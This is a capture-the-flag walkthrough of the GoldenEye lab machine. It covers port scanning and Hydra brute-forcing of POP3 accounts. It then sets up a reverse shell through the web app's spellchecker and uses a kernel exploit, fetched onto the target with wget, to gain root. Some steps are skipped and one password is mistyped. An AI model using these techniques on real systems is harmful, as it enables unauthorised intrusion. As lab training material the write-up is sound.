This is an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. It is an Intermediate machine and has a good variety of techniques needed to get root with no exploit development/buffer overflows.
1. Reconnaissance
Scanning the network to find vulnerable machine's IP
We find the IP of the vulnerable machine to be 192.168.10.26
2. Scanning
2.1 Nmap
Using nmap to find the open ports and their services
nmap -Pn -p- -A 192.168.10.26
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 09:48 IST
Nmap scan report for 192.168.10.26
Host is up (0.0022s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: GoldenEye Primary Admin Server
|_http-server-header: Apache/2.4.7 (Ubuntu)
55006/tcp open ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: USER CAPA UIDL RESP-CODES SASL(PLAIN) TOP STLS PIPELINING AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:3C:E6:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 2.24 ms 192.168.10.26
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds
We find tcp ports 25 , 80, 55006and 55007 open with smtp, apache web server, a Dovecot mail server and pop3 running respectively.
web-server
Browsing over to the webpage
Here we are greeted with a super cool home page with a login path /sev-home provided for user login.
Viewing the source code of this page,
We can see that there is a javascript file terminal.js referenced.... Seems interesting.
Navigating to terminal.js , we find a message to Boris in the comments
We get 2 potential usernames Boris and Natalya and a url encoded password
Decoding the password InvincibleHack3r
InvincibleHack3r
/sev-home
Navigating to /sev-home, we get a login page
Using the credentials boris : InvincibleHack3 , we can login to the page
We can see an ode to the James Bond movie GoldenEye and a reference to their pop3 servers.This might be a hint.
2.2 Brute-forcing pop3 (Natalya)
We can use hydra to brute force the password of pop3 server of natalya using the word list /usr/share/wordlists/fasttrack.txt
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.10.26:55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-20 10:17:17
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.10.26:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.10.26 login: natalya password: bird
[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-20 10:19:17
We get the credentials:
natalya : bird
2.3 Dumping mails via pop3 (Natalya)
We can use nc to access the pop3 server and login in with the credentials. Using the list command to show all the mails
nc 192.168.10.26 55007
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
There are two mails sent to Natalya
Retrieving the 1st message
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
Nothing much interesting there, other than mention of boris' weak credentials
Retrieving the 2nd message
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is its related to security...even if its not, just enter it in under the guise of "security"...itll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didnt have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since youre a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
Here we get another set of credentials, for their inner domain severnaya-station.com/gnocertdir
xenia : RCP90rulez!
Adding severnaya-station.com to our hosts file as specified
Accessing http://severnaya-station.com/gnocertdir/login/index.php and logging in using the above credentials.
Navigating to the message folder
Navigation > Home > My profile > Messages > Recent conversations
We find a message from another potential user, doak
2.4 Brute-forcing pop3 (Doak)
Using hydra to brute force the password of pop3 server of doak using the word list /usr/share/wordlists/fasttrack.txt
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.10.26 -s 55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-20 10:35:08
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.10.26:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.10.26 login: doak password: goat
[STATUS] attack finished for 192.168.10.26 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-20 10:37:25
We get the credentials:
doak : goat
2.5 Dumping mails via pop3 (Doak)
We can again use nc to access the pop3 server and login in with the credentials. Using the list command to show all the mails
nc 192.168.10.26 55007 2m 17s root@j0zack
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
There is one mail
Retreiving it;
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If youre reading this, congrats youve gotten this far. You know how tradecraft works right?
Because I dont. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
We get doak's login credentilas
dr_doak : 4England!
Logging in as dr_doak
Navigating to private files
Navigation > Home > My profile > My private files
There is a s3cret.txt for James
Viewing s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
From the message, we can conclude that the sender was able to capture the admin credentials over clear text.
We are given another location where we find an image file. Maybe, the credentials are obfuscated in it?
2.6 Reading hidden data from image
Downloading the image using wget
wget http://192.168.10.26/dir007key/for-007.jpg
--2022-04-20 10:47:23-- http://192.168.10.26/dir007key/for-007.jpg
Connecting to 192.168.10.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’
for-007.jpg 100%[=============================================================================>] 14.55K --.-KB/s in 0s
2022-04-20 10:47:23 (353 MB/s) - ‘for-007.jpg’ saved [14896/14896]
Steganography is the practice of concealing a message within another message or a physical object.
We can use strings to find out any data hidden in the image.
strings for-007.jpg
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
GoldenEye
linux
For James
0231
0100
ASCII
For 007
""""""""""
! !!! !!!!!!!!"""""""""""""""
-------------------------------------------------------------------
We find a base64 encoded string in the file eFdpbnRlcjE5OTV4IQ==
Pasting the code in Path to a spell (make sure to change IP and port) and saving it as well.
Navigating to Site blogs and adding a new entry
Home > Site pages > Site blogs
Starting an nc listener to capture our reverse connection
nc -lvnp 1234
listening on [any] 1234 ...
Entering some random text in the Blog entry body field and using the spellcheck functionality to trigger our reverse shell script.
Stabilizing the shell
nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.10.25] from (UNKNOWN) [192.168.10.26] 39488
/bin/sh: 0: cant access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
4. Privilege Escalation
4.1 Kernal Exploit
Checking the version of the kernel using uname -a
www-data@ubuntu:/$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
We see that the system is using an outdated kernel
Searching for potential exploits
searchsploit Linux ubuntu 3.13.0-32
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loc | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loc | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write ( | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege E | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege E | linux/local/41760.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
We find an overlayfs privilege escalation exploit 37292
Coping it over to our current directory,
searchsploit -m 37292
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /opt/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines
Copied to: ~/goldeneye/37292.c
Checking for an appropriate compiler to compile our exploit in our target system
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ which gcc
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ which cc
/usr/bin/cc
We find out that the target does not have a gcc compiler, instead it has cc
So we need to edit the source code of our exploit and change gcc to cc (line 143) in order to run it in our target system.(Even though we are compiling the exploit and then sending it to our target system, the compiled code can also give an error if the compiler is not present.)
Compiling the file as exploit and hosting it using python server
cc 37292.c -o exploit
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Downloading the exploit in the temp directory, making it executable and running it.
www-data@ubuntu:/$ cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.10.25:8000/exploit
--2022-04-19 22:52:38-- http://192.168.10.25:8000/exploit
Connecting to 192.168.10.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21064 (21K) [application/octet-stream]
Saving to: 'exploit'
100%[======================================>] 21,064 --.-K/s in 0.02s
2022-04-19 22:52:38 (1.07 MB/s) - 'exploit' saved [21064/21064]
www-data@ubuntu:/tmp$ chmod +x exploit
www-data@ubuntu:/tmp$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
whoami
root
We are root
Viewing the flag which is hidden in the /root directory
cd /root
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
